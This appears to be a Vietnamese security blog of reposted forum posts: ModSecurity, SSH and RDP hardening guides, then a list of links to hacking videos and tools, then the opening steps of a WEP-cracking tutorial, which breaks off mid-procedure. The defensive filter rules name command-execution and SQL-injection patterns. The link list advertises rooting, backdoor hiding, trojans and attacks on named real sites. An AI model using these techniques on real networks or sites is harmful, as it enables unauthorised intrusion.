Thursday, September 11, 2008

Phát hiện và chống xâm nhập Web Server với Mod Security

Phát hiện và chống xâm nhập Web Server với Mod Security
1. giới thiệu về Mod_security
ModSecurity là một bộ máy phát hiện và phòng chống xâm nhập dành cho các ứng dụng web (hoặc 1 web application firewall). Hoạt động như một module của máy chủ web Apache, mục đích của ModSecurity là tăng cường bảo mật cho các ứng dụng web, bảo vệ chúng khỏi các loại tấn công đã biết và chưa biết.

Sau khi cài đặt Apache mặc định sẽ không có mod_security.Bạn phải download mod_security từ http://www.modsecurity.org .Phiên bản mới nhất hiện nay là 1.9. Mod_security dùng được cho cả apache 1.x và 2.x (trên cả windows ,*.nix …)

2.Cài đặt và cấu hình:
Việc install Mod_security tương đối đơn giản,sau khi đã download Binary packages về:
Với apache 2.x:
Bạn chỉ việc copy file mod_security.so vào thư mục modules/ của apache và mở file httpd.conf thêm vào dòng sau:
LoadModule security_module modules/mod_security.so
là có đã hoàn thành bước cài đặt
Với apache 1.x:
Ban copy file mod_security.so (*.nix ) hoăc mod_security.dll (windows) vào thư mục libexec/ và mở file httpd.conf thêm vào dòng sau:
LoadModule security_module libexec/mod_security.so
Để sử dụng mod_security bạn phải cấu hình cho nó( cái này tùy vào mỗi hệ thống mà sẽ dẫn đến những cấu hình khác nhau). Trước tiên bạn mở file httpd.conf ra và thêm vào dòng sau:

# cấu hình cho mod_security

hoặc bạn có thể tạo riêng một file là modsecurity.conf trong thư mục conf cua apache và include nó tù file cấu hình của apache httpd.conf:

include conf/modsecurity.conf

Sau khi cài đặt mặc định bộ máy filtering sẽ disable ( muốn dùng mod_security chúng ta phải bật nó lên).
Ban chỉ việc thêm vào dòng sau trong file modsecurity.conf:
SecFilterEngine On ( or Off , DynamicOnly )
Sau đây là cách cấu hình cho mod_security để hạn chế những kiểu tấn công cơ bản:

#Chống lại kiểu tấn công thực thi các lệnh:
SecFilter /etc/password
SecFilter /bin/ls
#Chống lại kiểu tấn công Directory traversal
SecFilter "\.\./"
#Lọc các kí tự hay dùng trong shell code
SecFilterForceByteRange 32 126
#Lọc các kí tụ hay dùng trong XSS attack
SecFilter "<(.|\n)+>"
SecFilter "<[[:space:]]*script"
#chống lại kiểu tấn công XSS thông qua PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
#Hạn chế sqlinjection attack
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
#Hạn chế MSSQL injection attack
SecFilter xp_enumdsn
SecFilter xp_filelist
SecFilter xp_availablemedia
SecFilter xp_cmdshell
SecFilter xp_regread
SecFilter xp_regwrite
SecFilter xp_regdeletekey
#chống spam mail

SecFilterSelective "ARG_recipient" "!@modsecurity\.org$"

#phát hiện xâm nhập
SecFilterSelective OUTPUT "Volume Serial Number"
SecFilterSelective OUTPUT "Command completed"
SecFilterSelective OUTPUT "Bad command or filename"
SecFilterSelective OUTPUT "file(s) copied"
SecFilterSelective OUTPUT "Index of /cgi-bin/"
SecFilterSelective OUTPUT ".*uid\=\("
#Nếu muốn ghi lại log
SecAuditLog logs/audit.log
SecFilterDebugLog logs/modsec.log
SecFilterDebugLevel 0
#Muốn mod_security phân tích POST request, dùng:
SecFilterScanPOST On

# để mod_security *kiểm tra* URL encoding và UTF-8.
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding On
Lưu ý:nếu bạn dùng SecFilterCheckUnicodeEncoding On, một số bộ gõ hay input tiếng Việt sẽ không hoạt động, một số bộ gõ hay input tiếng Việt sẽ không hoạt động
Nếu bạn chạy web với nhiều virtualhost và muốn một site trong nhiều sites không dùng mod_security, bạn có thể dùng:
SecFilterSelective SERVERNAME "^tên_của_web_site$" nolog,allow

3. Lời kết
Trên đây chỉ là vài cấu hình cơ bản,Còn rất nhiều kiểu cấu hình mà tôi không đề cập (tùy thuộc vào hệ thống của bạn mà có cấu hình cho thích hợp).
Chúc bạn thanh công.
(st)


۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

*** Một người đi xe máy va phải chú sẻ bay ngược chiều. Anh ta dừng xe, thấy chưa chết bèn nhặt về đắp thuốc rồi thả vào lồng. Tỉnh lại, thấy mình bên song sắt, chú sẻ thở dài: - Bỏ mẹ. Mình đâm chết thằng đi xe máy rồi. Chắc tù mọt gông đây..pó tay con chim ***

_.:: Nếu bài biết hay xin hãy kích Thank ::._

url:http://haiphongit.com/forum/showthread.php?t=2830

Mẹo và thủ thuật bảo mật SSH nâng cao

Mẹo và thủ thuật bảo mật SSH nâng cao
Mẹo và thủ thuật bảo mật SSH nâng cao



Trong bài này, chúng tôi giới thiệu một số thủ thuật đơn giản giúp bạn nâng cao tính năng bảo mật cho dịch vụ Secure Shell (SSH).


File cấu hình server SSH được đặt trong thư mục /etc/ssh/sshd_conf. Bạn cần khởi động lại dịch vụ SSH sau mỗi lần thay đổi để các thay đổi đó được thực thi.

Thay đổi cổng SSH

Mặc định, SSH tuân theo các kết nối đến trên cổng 22. Kẻ tấn công thường sử dụng phần mềm quét cổng xem liệu các host (máy trạm) có sử dụng dịch vụ SSH không. Thay đổi cổng SSH lên cao hơn 1024 là một lựa chọn khôn ngoan, vì hầu hết mọi chương trình quét cổng (gồm cả nmap) mặc định đều rà soát được các cổng cao.

Mở file /etc/ssh/sshd_config và tìm dòng có ghi:
Port 22
Thay đổi số cổng và khởi động lại dịch vụ SSH:
/etc/init.d/ssh restart
Chỉ cho phép sử dụng giao thức SSH 2

Có hai loại giao thức SSH. Nếu chỉ dùng giao thức SSH 2 thì sẽ an toàn hơn nhiều vì SSH 1 thường gặp phải vấn đề bảo mật với kiểu tấn công man-in-the-middle và insertion. Mở file /etc/ssh/sshd_config và tìm dòng sau:
Protocol 2,1
Thay đổi dòng thành protocol 2.

Chỉ cho phép một số đối tượng người dùng đăng nhập qua SSH

Bạn không nên cho phép người dùng root đăng nhập qua SSH, vì điều này gây nên mối đe doạ bảo mật lớn mà không cần thiết. Nếu một kẻ tấn công nào đó thu được đặc quyền root khi đăng nhập vào máy, khả năng phá hoại có thể gấp mấy lần người dùng thông thường. Bạn nên cấu hình server SSH không cho phép người dùng root đăng nhập. Đầu tiên, tìm dòng ghi:
PermitRootLogin yes
Thay đổi yes thành no và khởi động lại dịch vụ. Sau đó bạn có thể đăng nhập lại hệ thống với bất kỳ vai trò người dùng xác định nào đó và chuyển sang người dùng root nếu muốn trở thành siêu người dùng.

Sẽ khôn ngoan hơn khi tạo một user cục bộ giả hoàn toàn không có đặc quyền gì trên hệ thống và dùng tên user đó để đăng nhập SSH. Sử dụng cách thức này sẽ giúp máy tính không bị hại dù tài khoản người dùng có bị xâm phạm. Khi tạo người dùng này, hãy chắc chắn nó phải nằm trong nhóm wheel để bạn có thể chuyển sang nhóm superuser (siêu người dùng) nếu cần.

Nếu muốn tạo danh sách một số đối tượng người dùng được phép đăng nhập vào SSH, bạn có thể mô tả chúng trong file sshd_config. Ví dụ, nếu muốn cho phép người dùng anze, dasa, kimy đăng nhập qua SSH, ở cuối file sshd_config, thêm vào một dòng như sau:
AllowUsers anze dasa kimy
Tạo banner SSH tuỳ biến

Nếu muốn mời một người dùng kết nối tới dịch vụ SSH để xem một thư nào đó, bạn có thể tạo banner SSH tuỳ biến. Thực hiện đơn giản bằng cách tạo một file text (trong ví dụ là file etc/ssh-banner.txt) và đặt bất kỳ kiểu thư text nào bạn có vào trong đó. Ví dụ:
*****************************************************************
*This is a private SSH service. You are not supposed to be here.*
*Please leave immediately. *
*****************************************************************
Khi muốn chỉnh sửa hoặc ghi file, trong sshd_conf, tìm dòng ghi:
#Banner /etc/issue.net
Không cần bình luận về dòng trên mà hãy thay đổi đường dẫn tới file text banner SSH tuỳ biến của bạn.

Sử dụng cơ chế thẩm định khoá công cộng DSA

Thay vì sử dụng tên và mật khẩu khi đăng nhập vào SSH, bạn có thể dùng cơ chế thẩm định khoá công cộng DSA. Chú ý rằng bạn có thể sử dụng username, password và khoá DSA cùng một lúc. Sử dụng cơ chế thẩm định khoá công cộng DSA cho phép hệ thống ngăn chặn được kiểu tấn công theo sách vở, vì bạn có thể đăng nhập vào dịch vụ SSH mà không cần dùng đến tên và mật khẩu. Thay vào đó, bạn cần một cặp khoá DSA: một khoá chung (public) và một khoá riêng (private). Khoá riêng được giữ trên máy của bạn, còn khoá chung được đưa lên server. Khi muốn đăng nhập vào một phiên SSH, server sẽ kiểm tra khoá. Nếu tất cả thông số đều khớp, bạn được đưa vào hệ thống. Nếu khoá không khớp, kết nối bị ngắt.

Ở ví dụ dưới đây, máy riêng sẽ kết nối tới máy chủ được đặt tên là station1 và máy chủ là server1. Trên cả hai máy đều có cùng một thư mục chủ (home folder). Chú ý là kết nối sẽ không hoạt động nếu thư mục chủ trên client và server khác nhau. Đầu tiên, tạo một cặp khoá trên máy riêng với lệnh ~$ ssh-keygen -t dsa. Bạn sẽ được nhắc cụm mật khẩu cho khoá riêng, nhưng hãy để trống, chúng ta chưa quan tâm đến phương thức này vội. Một cặp khoá được tạo: khoá riêng nằm trong ~/.ssh/id_dsa và khoá chung được đặt tại .ssh/id_dsa.pub.

Tiếp theo, copy nội dung ~/.ssh/id_dsa.pub to server1 vào file ~/.ssh/authorized_keys. Nội dung trong ~/.ssh/id_dsa.pub có dạng:
~$ cat .ssh/id_dsa.pub
ssh-dss AAAAB3NzaC1kc3MAAACBAM7K7vkK5C90RsvOhiHDUROvYbNgr7YEqtrdfFCUVwMWcJYDusNG
AIC0oZkBWLnmDu+y6ZOjNPOTtPnpEX0kRoH79maX8NZbBD4aUV91lbG7z604ZTdrLZVSFhCI/Fm4yROH
Ge0FO7FV4lGCUIlqa55+QP9Vvco7qyBdIpDuNV0LAAAAFQC/9ILjqII7nM7aKxIBPDrQwKNyPQAAAIEA
q+OJC8+OYIOeXcW8qcB6LDIBXJV0UT0rrUtFVo1BN39cAWz5puFe7eplmr6t7Ljl7JdkfEA5De0k3WDs
9/rD1tJ6UfqSRc2qPzbn0p0j89LPIjdMMSISQqaKO4m2fO2VJcgCWvsghIoD0AMRC7ngIe6btaNIhBbq
ri10RGL5gh4AAACAJj1/rV7iktOYuVyqV3BAz3JHoaf+H/dUDtX+wuTuJpl+tfDf61rbWOqrARuHFRF0
Tu/Rx4oOZzadLQovafqrDnU/No0Zge+WVXdd4ol1YmUlRkqp8vc20ws5mLVP34fST1amc0YNeBp28EQi
0xPEFUD0IXzZtXtHVLziA1/NuzY= anze@station1.example.com
Nếu file ~/.ssh/authorized_keys đã tồn tại, gắn thêm nội dung trong ~/.ssh/id_dsa.pub vào file ~/.ssh/authorized_keys trên server1. Bạn chỉ cần thực hiện một việc là thiết lập chính xác đặc quyền trong file ~/.ssh/authorized_keys trên server1:
~$ chmod 600 ~/.ssh/authorized_keys
Bây giờ cấu hình file sshd_conf để sử dụng cơ chế thẩm định khoá DSA. Hãy chắc chắn rằng bạn có ba dòng không chú thích sau:
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys
Khởi động lại dịch vụ. Nếu mọi thứ đã được cấu hình chính xác, bạn đã có thể sử dụng SSH cho server và đặt trực tiếp nó vào thư mục chủ mà không cần bất kỳ tương tác nào khác.

Nếu muốn chỉ sử dụng duy nhất một cơ chế thẩm định DSA, không cần chú thích hay thay đổi dòng PasswordAuthentication trong file sshd_config từ yes thành no:
PasswordAuthentication no
Nếu ai đó cố gắng kết nối tới dịch vụ SSH mà không có khoá chung trên server, anh ta sẽ bị từ chối và thậm chí không được đưa nền đăng nhập ra với thông báo lỗi:
Permission denied (publickey).
Sử dụng các hàm bao TCP để cho phép chỉ một số host được kết nối

Phương thức trên sẽ rất hữu ích nều bạn muốn giới hạn số host trên mạng có thể kết nối tới dịch vụ SSH. Nhưng nó không thể sử dụng hoặc kết hợp được với cấu hình các bảng IP (iptable). Thay vào đó, bạn có thể dùng các hàm bao TCP, cụ thể là sshd TCP. Bạn có thể đưa ra quy tắc chỉ cho phép một số host nhất định trên mạng con cục bộ (local subnet) 192.168.1.0/24 và host từ xa 193.180.177.13 kết nối tới dịch vụ SSH.

Các hàm bao TCP mặc định đầu tiên sẽ xem trong file /etc/hosts.deny danh sách các host bị từ chối kết nối tới dịch vụ. Tiếp theo là file /etc/hosts để xem liệu có quy tắc nào cho phép một số host kết nối tới một dịch vụ đặc biệt nào đó không. Ví dụ, tôi sẽ tạo một quy tắc như vậy trong tư mục /etc/hosts.deny:
sshd: ALL
Quy tắc trên có nghĩa là, mặc định tất cả các host đều bị cấm truy cập dịch vụ SSH. Điều này là cần thiết, vì nếu không tất cả các host ở đây đều có quyền truy cập dịch vụ SSH. Do hàm bao TCP đầu tiên sẽ xem xét trong file hosts.deny, nếu không có quy tắc nào liên quan đến ngăn chặn sử dụng dịch vụ SSH, bất kỳ host nào cũng có thể đến nôi đến nó. Tiếp theo, tạo một quy tắc trong /etc/hosts để cho phép chỉ một số host cụ thể (như được định nghĩa ở trên) sử dụng dịch vụ SSH:
sshd: 192.168.1 193.180.177.13
Bây giờ, chỉ có các host trên mạng 192.168.1.0/24 và host 193.180.177.13 mới có quyền truy cập dịch vụ SSH. Tất cả host khác đều bị ngắt kết nối trước khi được đăng nhập và nhận một thông báo lỗi như sau:
ssh_exchange_identification: Connection closed by remote host
Sử dụng iptables để giới hạn số lượng host được kết nối

Một lựa chọn khác ngoài các hàm bao TCP là giới hạn truy cập SSH với iptables (các bảng địa chỉ IP). Song, bạn có thể sử dụng kết hợp cả hai phương thức này cùng một lúc. Dưới đây là một ví dụ đơn giản về cách cho phép một số host nhất định kết nối tới SSH:
~# iptables -A INPUT -p tcp -m state --state NEW --source 193.180.177.13 --dport 22 -j ACCEPT
Và để chắc chắn rằng không có host nào khác được truy cập dịch vụ SSH:
~# iptables -A INPUT -p tcp --dport 22 -j DROP
Ghi lại một số quy tắc mới và hoàn chỉnh công việc.

Một số mẹo thời gian SSH

Bạn có thể dùng các tham số iptables khác để giới hạn kết nối tới dịch vụ SSH trong một khoảng thời gian nhất định. Kiểu thời gian có thể là giây, phút, giờ, hoặc ngày (/second, /minute, /hour, /day ), như ví dụ dưới đây.

Ở ví dụ đầu, nếu người dùng nhập mật khẩu sai, truy cập vào dịch vụ SSH sẽ bị khoá trong một phút. Và sau đó người dùng chỉ được phép gõ thông tin đăng nhập vào sau từng phút:
~# iptables -A INPUT -p tcp -m state --syn --state NEW --dport 22 -m limit --limit 1/minute --limit-burst 1 -j ACCEPT
~# iptables -A INPUT -p tcp -m state --syn --state NEW --dport 22 -j DROP
Trong ví dụ thứ hai, iptables được thiết lập chỉ cho phép host 193.180.177.13 kết nối tới dịch vụ SSH. Sau ba lần đăng nhập thất bại, iptables chỉ cho phép host đăng nhập lại sau từng phút:
~# iptables -A INPUT -p tcp -s 193.180.177.13 -m state --syn --state NEW --dport 22 -m limit --limit 1/minute --limit-burst 1 -j ACCEPT
~# iptables -A INPUT -p tcp -s 193.180.177.13 -m state --syn --state NEW --dport 22 -j DROP
Kết luận

Các thành phần này không khó cầu hình, nhưng chúng là những kỹ thuật rất mạnh trong chế độ bảo mật dịch vụ SSH. Bỏ ra chút thời gian đầu tư, bạn sẽ có được giấc ngủ ngon.


۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

urlhttp://haiphongit.com/forum/showthread.php?t=2105

Tăng Độ Bảo Mật Khi Remote Desktop Bằng SSL

Tăng Độ Bảo Mật Khi Remote Desktop Bằng SSL
I. Giới Thiệu
- Mặc định Terminal server dùng chế độ mã hóa native RDP . Chế độ này không chứng thực server . Do đó để gia tăng tính bảo mật khi remote desktop thì chúng ta sẽ sử dụng Transport Layer Security (TLS) version 1.0 . Với chế độ này chúng ta có thể mã hóa và chứng thực máy remote tới server

II. Chuẩn bị
- Máy client phải là windows XP or window 2000 và phải cài RDP 5.2 . Download tại đây : http://nhatnghe.com/tailieu/remote_ssl/tool/rdp.msi

- Máy Terminal server phải là windows server 2003 SP1 trở lên . Phải cài các component sau : ( phải cài theo thứ tự )
* ASP.net
* IIS
* Stand alone – CA

III. Thực Hiện

A. Cấu hình trên máy Terminal Server

• Cài đặt Certificate

B1 : Mở Internet explorer : đánh vào địa chỉ http://IP_máy_server/certsrv
B2 : Chọn Request a certificate


B3 : Chọn Advanced Certificate Request


B4: Chọn Create and submite a request to this CA


B5 : Điền thông tin trong phần Identifying Information giống như trong hình .
***** Phần name rất quan trọng . Nếu bạn muốn client remote bằng tên gì thì tên CA phải để giống như vậy. Ví dụ nếu muốn remote qua đường internet thì chỗ này phải để con IP tĩnh , or domain , or host cập nhật IP động . Còn làm test trong lan chơi thì chỗ này hoặc là để IP hoặc là để tên máy tính ( tùy vào việc muốn client remote tới server bằng cái gì )
- Type of certificate needed : Chọn Server Authentication Certificate


Cuộn xuống dưới :
- CSP : chọn Microsoft RSA SChannnel Cryptographic Provider
- Chọn mục Mark keys as exportable
- Chọn mục Store certificate in the local computer certificate store
- Chọn Submite > Yes





B6 : Start > Program > Administrative tools > Certification Authority > Chọn Pending Request
B7 : Chuột phải lên CA trong đây > All tasks > Issue


B8 : Mở IE > truy cập http://IP_máy_server/certsrv
Chọn View the status of a pending certificate request


Chọn Server Authentication Certificate


Chọn install this certificate


Chọn yes


• Cấu hình Transport Layer Security : chứng thực và mã hóa

B1 : Start > Program > Administrative tools > Terminal Services Configuration
B2 : Trong khung bên trái chọn connection > Khung bên phải : chuột phải RDP-tcp > chọn Properties



B3 : Trong tab General > Chọn Edit



B4 : Chọn CA đã xin > Ok > OK



B5 : Trong phần security layer có 3 lựa chọn :
*RDP Security Layer : chế độ mặc định khi remote desktop thông thường
*Negotiate : Chế độ này sẽ dùng TLS để chứng thực máy client , tuy nhiên nếu máy client không hỗ trợ TLS thì máy đó sẽ không được chứng thực
*SSL : Chế độ này sẽ dùng TLS để chứng thực máy client , nếu máy client không hỗ trợ TLS thì sẽ không thể tạo kết nối tới server

- Ở đây chúng ta dùng chế độ SSl
- Nếu dùng SSL or Negotiate thì trong phần encrytion level phải chọn là High . Ở chế độ high này thì đường truyền sẽ được mã hóa ở chế độ 128 bit
- Đánh dấu chọn vào mục “Use standard Windows logon interface”

B. Download CA từ máy Server và import vào client

Thực hiện trên Server
B1 : Mở IE đánh địa chỉ : http://localhost/certsrv
B2 : Chọn Download a CA certificate , certificate chain , or CLS


B3 : Chọn Download a certificate


B4 : Chọn Save > chọn nơi lưu > copy file mới save dzô USB để dành



Thực hiện trên client :
B1 : Mở start > run > đánh lệnh MMC
B2 : Menu File > Chọn add/remove spap-in > chọn Add
B3 :Chọn Certificates



B4 : Chọn Computer accounts > next > Finish



B5 : Chỉnh Regedit > Start > run > regedit > tìm đến khóa HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client

- Chuột phải lên Terminal Server Client > chọn New > Dword value > Sửa tên giá trị mới tạo thành AuthenticationLevelOverride

- Double click vào AuthenticationLevelOverride > Trong ô value data đánh vào gía trị : 1

B6 : Kiểm tra : Start > program > remote desktop connection ( anh nào mở start > run > oánh mstsc >Có thể nó ra phiên bản RDP cũ hổng chạy ráng chịu )

B7 : Trong cửa sổ remote connection > chọn option > qua tab security > Quan sát trong mục Authentication > là Required Authentication



B8: Qua tab General > điền vào phần computer cái tên CA mà bạn đã xin trên server ( tên máy tính , IP …. ) > chọn connect



B9 : Remote thành công > quan sát thấy đường truyền giữa client và server đã được mã hóa ( cái biểu tượng khóa màu vàng á )

Ngồn : Nhatnghe

url:http://haiphongit.com/forum/showthread.php?t=2842

bộ sưu tập tổng hợp link down các video dạy hack

bộ sưu tập tổng hợp link down các video dạy hack
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha


1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html

Sưu tập


۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của itvnn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

url:http://haiphongit.com/forum/showthread.php?t=1388

Tuesday, September 9, 2008

Tutorial: Cracking WEP Using Backtrack 3

19 Aug 2008
Tutorial: Cracking WEP Using Backtrack 3
Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.

Requirements:

* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]
airodumpwifi0.png

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

airodumpoutput.png

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

